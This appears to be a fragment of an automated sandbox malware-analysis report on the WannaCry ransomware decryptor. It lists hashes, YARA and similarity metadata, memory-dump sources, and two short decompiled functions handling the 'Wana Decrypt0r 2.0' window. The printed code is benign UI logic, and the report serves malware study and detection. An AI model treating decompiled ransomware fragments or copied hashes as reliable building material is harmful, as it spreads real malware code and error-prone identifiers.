                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825
                                  • String ID: j'@
                                  • API String ID: 41483190-370697233
                                  • Opcode ID: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                  • Instruction ID: 592289367714aa5b9ee555d1ba3af08658367c911d5aba0fbb12e5c1e921281d
                                  • Opcode Fuzzy Hash: 26610df6b5a4c2806844896bd07b67cdb6c8bfe7b1f6638f76bfb97b56d4ac40
                                  • Instruction Fuzzy Hash: 771185B62046008FC724CF19D18096BFBE6FF99320714893EE29A97380D376EC05CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00407650(void* __ecx, intOrPtr _a4) {
                                  				intOrPtr _t3;
                                  				void* _t4;
                                  
                                  				_t3 = _a4;
                                  				if(_t3 != 0x3e9) {
                                  					if(_t3 == 0x3ea) {
                                  						_t3 =  *((intOrPtr*)(__ecx + 0x820));
                                  						if(_t3 == 0) {
                                  							_t3 = E0040B620(L"Wana Decrypt0r 2.0", 0);
                                  						}
                                  					}
                                  					L00412CBC();
                                  					return _t3;
                                  				} else {
                                  					_t4 = E004076A0(__ecx, 1);
                                  					L00412CBC();
                                  					return _t4;
                                  				}
                                  			}






                                  APIs
                                  • #2379.MFC42 ref: 00407692
                                    • Part of subcall function 004076A0: time.MSVCRT ref: 004076DA
                                  • #2379.MFC42(00000001), ref: 00407667
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379$time
                                  • String ID: Wana Decrypt0r 2.0
                                  • API String ID: 2017816395-4201229886
                                  • Opcode ID: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction ID: 44448bb0997210edcc5ff830349606876b09c28d76a722c823a6afa91302379c
                                  • Opcode Fuzzy Hash: 6fa7a2fc7c6a80e94799593ebee71b884435da4c0666664eaea2c240bbcf3164
                                  • Instruction Fuzzy Hash: 58E08631B0491017D6117B19A942B9F51845B60724F104C3FF506FA2C2E96E7D9183DF
                                  Uniqueness

                                  Uniqueness Score: -1.00%